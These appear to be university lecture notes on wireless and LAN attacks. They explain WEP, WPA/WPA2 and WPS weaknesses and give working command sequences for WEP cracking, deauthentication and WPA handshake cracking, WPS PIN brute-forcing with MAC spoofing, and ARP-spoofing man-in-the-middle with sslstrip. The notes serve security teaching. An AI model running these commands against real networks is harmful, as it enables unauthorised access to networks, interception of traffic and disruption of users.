1 12-LanHacking

1.1 Tools for the day:

1.1.1 1. You

12-LanHacking/comic.jpg
a https://en.wikipedia.org/wiki/Script_kiddie is not the following…
12-LanHacking/script_kitty.jpg

1.1.2 2. Hardware

Alfa AWUS036NHA Atheros AR9271 802.11n WIRELESS-N USB Wi-Fi adapter
- Atheros chipsets generally have good Linux compatibility
- (or another of your choosing)
  
  Note: this particular model pulls a lot of power (maybe too much), so another model with an Atheros chipset might be better.
Optionally (your android phone)

1.1.3 3. Software

https://www.kali.org/ (Debian + extras), Fedora security labs spin, OpenSuse, or most any Linux, and the following packages:
- ip (ip_command_cheatsheet.pdf)
- iw
- ss
- aircrack-ng
- reaver
- wash
- netdiscover
- arpspoof
- wireshark
- ettercap
- macchanger (optionally)
Optionally on your phone
- Wifi Analyzer app (for basic WiFi exploration; no hacking):

There may be a mysterious new WiFi network in class today…

1.2 Wifi management and observation

#!/bin/bash

# view the new usb nic you just plugged in
lsusb

# view cards
ip link
iw dev
sudo airmon-ng

# view ip address
ip -color=always address
ip -c add
ip a

# default gateway
ip route

# change mac address (optional)
# wlan0 replace with your card name
sudo ip link set down dev <interface>
sudo ip link set down dev wlan0

sudo ip link set dev wlan0 address <interface-MAC>
sudo ip link set dev wlan0 address AA:BB:CC:DD:EE:FF

sudo ip link set up dev <interface>
sudo ip link set up dev wlan0

# put card in monitor / promiscuous mode
sudo airmon-ng start <interface>
sudo airmon-ng start wlan0

# or
sudo ip link set <interface> down
sudo ip link set wlan0 down

sudo iw dev <interface> set type monitor
sudo iw dev wlan0 set type monitor

sudo ip link set <interface> up
sudo ip link set wlan0 up

# check out your "new" promiscuous interface
ip link
iw dev
sudo airmon-ng

# watch local traffic
sudo airodump-ng <new-monitor-interface>
sudo airodump-ng wlan0mon
# ctrl-c to stop (it leaves graph on output)

# or watch with wireshark (assumes you put card in monitor mode).
sudo wireshark &

1.3 Attacks

1.3.1 Wired versus wireless

1.3.2 Locations and types of attack

1.4 What are BSSID, SSID, ESSID?

https://en.wikipedia.org/wiki/Service_set_(802.11_network)
12-LanHacking/ssid.png
BSSID:
Each basic service set has its own unique identifier, a BSSID, which is a unique 48-bit identifier, that follows MAC address conventions,
e.g., 12-34-56-78-9A-BC

SSID:
Chosen 0-32 bit name for BSS.
The SSID is broadcast by stations in beacon packets to announce the presence of a network.
e.g., MST-WPA-N

ESSID:
Chosen name for ESS,
e.g., MST-WPA-N

1.5 The first generation: Wired Equivalent Privacy (WEP)

https://en.wikipedia.org/wiki/Wired_Equivalent_Privacy

Security algorithm for IEEE 802.11 wireless networks
Part of the original 802.11 standard ratified in 1997
WEP is recognizable by its key of 10 or 26 hexadecimal digits (40 or 104 bits).
It was, at one time, widely in use, and was often the first security choice presented to users by router configuration tools.

It covers:
* C: encrypted
* I: data integrity check
* A: passphrase authentication

1.5.1 WEP setup

During configuration, pre-setup the AP and Node (you) with a pre-shared secret key.

1.5.2 WEP authentication

A standard challenge-response using a pre-sharked key.
12-LanHacking/auth_wep.png

WEP authentication
12-LanHacking/wep_fig1.png
Challenge-response:
1. A wireless host requests authentication by an access point.
2. The access point responds to the authentication request with a 128-byte nonce value.
3. The wireless host encrypts the nonce using the symmetric key that it pre-shared with the access point.
4. The access point decrypts the host-encrypted nonce.

1.5.3 WEP Encryption

Recall from the ../../Security/Content/10b-SymmetricStream.html day:

1.5.3.1 WEP RC4 encryption

1.5.3.2 WEP RC4 decryption

1.5.3.3 WEP RC4 summary

First a 4-byte cyclic redundancy check value is computed for the data payload.
Key value (in this case, the 64-bit (K_S, IV) key), 40 bits shared, IV is 24 bits
RC4 algorithm produces a stream of key values, k₁^IV , k₂^IV , k₃^IV, . . . that are used to encrypt the data and CRC value in a frame.

1.5.3.4 Encryption and Decryption

Encryption is performed by XOR-ing the i^th byte of data, d_i, with the ith key, k_i^IV, in the stream of key values generated by the (K_S, IV) pair to produce the i^th byte of ciphertext, c_i:

c_i = d_i \(\oplus\) k_i^IV

The IV value changes from one frame to the next and is included in plaintext in the header of each WEP-encrypted 802.11 frame (previous slide)
The receiver takes the secret 40-bit symmetric key that it shares with the sender, appends the IV, and uses the resulting 64-bit key (which is identical to the key used by the sender to perform encryption) to decrypt the frame:

d_i = c_i \(\oplus\) k_i^IV

1.5.4 WEP Vulnerabilities

1.5.4.1 Flaw 1: keystream re-use

Proper use of the RC4 algorithm requires that the same 64-bit key value never be used more than once.
Recall that the WEP “key” changes on a frame-by-frame basis.
For a given K_S (which changes rarely, if ever), this means that there are only 2²⁴ unique keys.
If these keys are chosen randomly, the probability of having chosen the same IV value (and hence used the same 64-bit key) is more than 99 percent after only 12,000 frames (almost certainly within a large video worth of traffic).
With 1 Kbyte frame sizes and a data transmission rate of 11 Mbps, only a few seconds are needed before 12,000 frames are transmitted.
Since the IV is transmitted in plain-text in the frame, an eavesdropper will know whenever a duplicate IV value is used.
Two frames that use the same IV likely use the same secret key and thus keystream

1.5.4.2 More flaws

Cyclic redundancy check is not cryptographically secure:
- an attacker who changes the encrypted content (e.g., substituting gibberish for the original encrypted data), computes a CRC over the substituted gibberish, and places the CRC into a WEP frame can produce an 802.11 frame that will be accepted by the receiver.
Weak keys are often chosen (human error and technical constraint of too-short keys)
PRNG is also bad too…

Conclusion: don’t use WEP unless you’re running an obvious honeypot…

1.5.4.3 Practical attack methods

#!/bin/bash

# capture the traffic
airodump-ng --bssid <target-BSSID> --channel <target-channel> -w <output-file> --ivs <wlan-mon-interface>

# generate some traffic by running these both for a while
# optional, but traffic is needed if user is not generating a lot already
aireplay-ng --fakeauth 0 -a <ap-BSSID> <wlan-mon-interface>
aireplay-ng --arpreplay -b <ap-BSSID> <wlan-mon-interface>

# Bust a cap in that pass, word.
aircrack-ng <saved-file.ivs>

# or
aircrack-ng -b <BSSID> <saved-file.ivs>

This attack does work reasonably quickly and reliably.
WEP APs have been decreasing in number and have been largely phased out, so it’s less relevant in the real world.

1.6 The next generations: WPA and WPA2

https://en.wikipedia.org/wiki/Wi-Fi_Protected_Access

WPA (sometimes referred to as the draft IEEE 802.11i standard) became available in 2003.
The Wi-Fi Alliance intended it as an intermediate measure in anticipation of the availability of the more secure and complex WPA2, which became available in 2004 and is a common shorthand for the full IEEE 802.11i (or IEEE 802.11i-2004) standard.

1.6.1 Authentication

WPA-personal:
- Also referred to as WPA-PSK (pre-shared key) mode.
- Is designed for home and small office networks.
- Doesn’t require an authentication server.
WPA-enterprise:
- Also referred to as WPA-802.1X mode, and sometimes just WPA (as opposed to WPA-PSK personal),
- this is designed for enterprise networks
- Requires a RADIUS authentication server.
- This requires a more complicated setup, but provides additional security
  - (e.g. protection against dictionary attacks on short passwords).
Wi-Fi protected Setup (WPS):
- This is an alternative authentication key distribution method intended to simplify and strengthen the process,
- a.k.a. a backdoor created for ease of access… err, ease of use?
- As widely implemented, it creates a major security hole via WPS PIN recovery.
- This protocol extension was really just objectively badly designed…

1.6.1.1 Authentication (personal PSK mode)

After the PSK or 802.1X authentication, a shared secret key is generated, called the Pairwise Master Key (PMK).
The PMK is derived from a password that is put through PBKDF2-SHA1 as the cryptographic hash function.
In a pre-shared-key network, the PMK is actually the PSK.
If an 802.1X EAP exchange was carried out, then the PMK is derived from the EAP parameters provided by the authentication server.
http://www.wifi-professionals.com/2019/01/4-way-handshake
http://etutorials.org/Networking/802.11+security.+wi-fi+protected+access+and+802.11i/Part+II+The+Design+of+Wi-Fi+Security/Chapter+10.+WPA+and+RSN+Key+Hierarchy/Details+of+Key+Derivation+for+WPA/ (if you want more detail)

4-way handshake password “cracking” works by checking MIC in the 4th frame.
That is, it only checks that KCK part of the PTK is correct.
4-way handshake doesn’t contain data that would allow checking of other parts of the PTK, but that’s actually not needed, for two reasons:
1. MIC verification is how AP checks the validity of PTK (and, consequently, the password);
2. Chances of a password producing a PTK that has valid KCK, but invalid other parts are really low: KCK is 128 bits, so probability of incorrect password producing correct KCK is 2¹²⁸.
Overall, 4-way password “cracking” works like this:
- 4-way handshake is parsed to get SP and STA addresses, AP and STA nonces, EAPOL payload, and MIC from 4th frame;
- Candidate password is used to compute PMK;
- PTK is computed from PMK, AP and STA addresses, and nonces;
- KCK from computed PTK is used to compute MIC of the EAPOL payload obtained at step 1;
- Computed MIC is compared to the MIC obtained at step 1.
  - If they match then candidate password is reported as correct.

If you’d like to see actual implementation of the attack, one place to start is coWPAtty sources, they’re relatively small, self-contained, and easy to read:
* https://github.com/joswr1ght/cowpatty
* http://www.willhackforsushi.com/code/cowpatty/4.6/cowpatty-4.6.tgz
* https://sourceforge.net/projects/cowpatty/
* https://tools.kali.org/wireless-attacks/cowpatty

1.6.2 Encryption

One can choose between:

TKIP (Temporal Key Integrity Protocol):
* The RC4 stream cipher is used with a 128-bit per-packet key, meaning that it dynamically generates a new key for each packet.
* This is one option used by WPA.
CCMP (CTR mode with CBC-MAC Protocol, AES):
* This is one protocol used by WPA2
* Based on the Advanced Encryption Standard (AES) cipher, along with strong message authenticity and integrity checking.
* It is significantly stronger in protection for both privacy and integrity than the RC4-based TKIP that is used by WPA.
* Informal names are “AES” and “AES-CCMP

Note: in your old router, choose the AES option exclusively over TKIP, if you can.

1.6.2.1 AES: CTR mode (nonce is IV here)

12-LanHacking/CTR-encr.png
12-LanHacking/CTR-decr.png

1.6.2.2 CBC-MAC

To calculate the CBC-MAC of message m, one encrypts m in CBC mode with zero initialization vector.
Blocks m₁ || m₂ ||… || m_x using a secret key k, and a block cipher E:
12-LanHacking/cbc-mac.png

1.6.3 Vulnerabilities come in two main categories

Exploits on proper functionality which has been mis-managed by the user
- Weak password!!!
Actual flaws/bugs to be exploited
- WPA packet spoofing and decryption
- WPS pin recovery
- MS-CHAPv2 design weakness
- Shared Group Temporal Key (GTK) flaw (hole196)
- Lack of forward secrecy (e.g., no use of DH/Diffie-Hellman)
- Predictable Group Temporal Key (GTK)
- KRACK attack (a replay attack)
- Control frames are not encrypted/authenticated (e.g., de-authentication)

1.6.3.0.1 Attack on WPA/WPA2 weak passwords

https://en.wikipedia.org/wiki/Aircrack-ng

Summary:
1. Kick someone off their own AP / WiFi router.
2. Capture the traffic when they perform their 4-way handshake, which contains a shared secret capable of reproducing the password!
3. Crack the “hashed” secret offline using a dictionary, rainbow table, or brute force.

#!/bin/bash

# Setup and choose network

# put wlan0 in monitor mode
# (if it is not already, from above demo)
sudo airmon-ng start <interface>
sudo airmon-ng start wlan0

# check out networks
# (if you have not already, from above demo)
sudo airodump-ng <new-monitor-interface>
sudo airodump-ng wlan0mon

# Capture traffic on network of interest
sudo airodump-ng --channel <ap-channel> --bssid <ap-BSSID> --write <capfilenamebase> <new-monitor-interface>
sudo airodump-ng --channel 6 --bssid 00:11:50:73:0D:24 --write capfile wlan0mon

# In a new terminal:
# Deauthenticate (kick off) -- these are ALTERNATIVES, but you can do both in different terminals at the same time
sudo aireplay-ng --deauth <count> -a <ap-BSSID> <new-monitor-interface>
sudo aireplay-ng --deauth 20 -a 00:11:50:73:0D:24 wlan0mon

# or (in Debian repos, but not Fedora)
sudo mdk3 <new-monitor-interface> d <ap-BSSID> -c <channel>
sudo mdk3 wlan0mon d 00:07:26:47:B0:35 -c 6

# to stop the airodump capture (it will save the recorded capfile.cap)
# ctrl-c
# To view wireless protocols
sudo wireshark <captured-file.cap>
sudo wireshark capfile.cap
# sort right column, look for authentication frames and frame type: key (4 frames)

# Crack capfile offline -- these are ALTERNATIVES below

# dictionary here (there are other brute force options below)
sudo aircrack-ng --bssid <ap-BSSID> <capfile> -w <dictionary-file>
sudo aircrack-ng --bssid 00:11:50:73:0D:24 capfile.cap -w /usr/share/john/password.lst

# or
# (not sure if these two below are correct):
sudo john --stdout --incremental:all | aircrack-ng --bssid <ap-BSSID> -w <capfile>
sudo john --stdout --incremental:all | aircrack-ng --bssid 00:11:50:73:0D:24 -w capfile.cap

# or
sudo cowpatty -r capfile.cap d dictionary_hash s dictionary
#rainbow-table

For more details on some of these attacks, see the https://acmsigsec.mst.edu/ Wifi Workshop document:
https://docs.google.com/document/d/e/2PACX-1vQag8Yo28K9ZbsbD1XWxkl7Yv1zfy62PIwA2HNVUixrYJXH38-7mvWLv0RkRCNvardE0X0lDy3j_Qxj/pub

Ask in class:
* About how many on average need to be tried?
* Is this “online” or “offline” cracking?
* How long might such an attack take?
* What are some defenses?

1.7 Wifi Protected Setup (WPS)

https://en.wikipedia.org/wiki/Wi-Fi_Protected_Setup

Though on WPA/WPA2 routers, it is largely independent of the handshaking and encryption protocol.
It is a badly designed intentional convenience “backdoor”.
Created by the WiFi Alliance and introduced in 2006, the goal of the protocol is to allow home users who know little of wireless security, and may be intimidated by the available security options, to set up (bypass) WPA, as well as making it easy to add new devices to an existing network without entering long passphrases…
When an enrollee attempts to gain access using a PIN (the easy shortcut password), the registrar reports the validity of the first and second halves of the PIN separately!
Since the first half of the pin consists of four digits (10,000 possibilities) and the second half has only three active digits (1000 possibilities), at most 11,000 guesses are needed before the PIN is recovered.
Further, many default PINs were hard-coded, e.g., 12345678, etc.

Ask in class:
* About how many on average need to be tried?
* Is this “online” or “offline” cracking?
* How long might such an attack take?
* What are some defenses?

1.7.1 Wifi Protected Setup attack software

Reaver
* online/realtime attack
* https://code.google.com/archive/p/reaver-wps/wikis/README.wiki

Bully
* online/real-time attack
* https://null-byte.wonderhowto.com/how-to/hack-wi-fi-breaking-wps-pin-get-password-with-bully-0158819/
* https://tools.kali.org/wireless-attacks/bully
* Newer, redundant with Reaver, generally not as good as Reaver

PixieWPS
* offline attack specific to some vendors
* in combination with Reaver or Bully, can speed up some attacks, and perform a newer class of related attack.
* https://github.com/wiire-a/pixiewps

1.7.2 Example bash commands

#!/bin/bash

# put wlan0 in monitor mode
# (if it is not already, from above demo)
sudo airmon-ng start <interface>
sudo airmon-ng start wlan0

# to see WPS networks
sudo airodump-ng --wps <new-monitor-interface>
sudo airodump-ng --wps wlan0mon

# to see WPS networks only
# Note: this is is the Debian repos, but not in Fedora basic
sudo wash --interface <new-monitor-interface>
sudo wash --interface wlan0mon

# the atttack
sudo reaver --interface=<new-monitor-interface> --bssid=<ap-BSSID>
sudo reaver --interface=wlan0mon --bssid=00:11:50:73:0D:24

# If you get rate-limited, there are many further options

# You can also change your MAC first,
# but it needs to be specified in Reaver execution as a flag.
# Note: this method works better than macchanger, for reaver.
# Note: start here without being in monitor mode already:
sudo ip link set down dev <interface>
sudo ip link set down dev wlan0

sudo ip link set dev <interface> address <desired-MAC-address>
sudo ip link set dev wlan0 address 00:BA:AD:BE:EF:69

sudo ip link set up dev <interface>
sudo ip link set up dev wlan0

sudo airmon-ng start <interface>
sudo airmon-ng start wlan0

sudo reaver --interface=<new-monitor-interface> --bssid=<ap-BSSID> -vv --mac=<faked-MAC-above>
sudo reaver --interface=wlan0mon --bssid=00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69

Notes:
* Reaver is finicky, and may require adjusting delay for router timeouts, nacks, acks, and other parameters before it “gets along” with the AP you are attacking.
* Many APs rate-limit the number of PINs that can be tried, either in a time window, or total, before some reset;
* AP limiting procedures are variable, and you may have to explore them interactively to determine what works best for a given AP.
* On newer routers that rate limit, this attack may take quite some time (1 month or more).

1.8 ARP spoofing / poisoning

https://en.wikipedia.org/wiki/ARP_spoofing

Once you are connected to the network, either switched/wired or wireless, use this to implement a man-in-the-middle (MiTM attack).
12-LanHacking/arp_spoof.png

1.8.1 Practical tools for attack

http://www.solutionsatexperts.com/arp-spoofing-attack-kali-linux/
https://ourcodeworld.com/articles/read/422/how-to-perform-a-man-in-the-middle-mitm-attack-with-kali-linux
https://www.cybrary.it/0p3n/using-sslstrip-in-kali-linux/

#!/bin/bash

# put your machine in forward mode (just a 1-bit text file)
echo "1" > /proc/sys/net/ipv4/ip_forward
# or
sysctl -w net.ipv4.ip_forward=1

# list everyone on network (Fedora does not have in repos?)
netdiscover

# show your default gateway
ip route

# show arp cache
ip neigh show

# attack from victim (Fedora does not have in repos?)
arpspoof -i [Network Interface Name] -t [Victim IP] [Router IP]

# attack from router
arpspoof -i [Network Interface Name] -t [Router IP] [Victim IP]

# wireshark, sslstrip, etc.,
sslstrip -w filename.txt -l 1000

The END!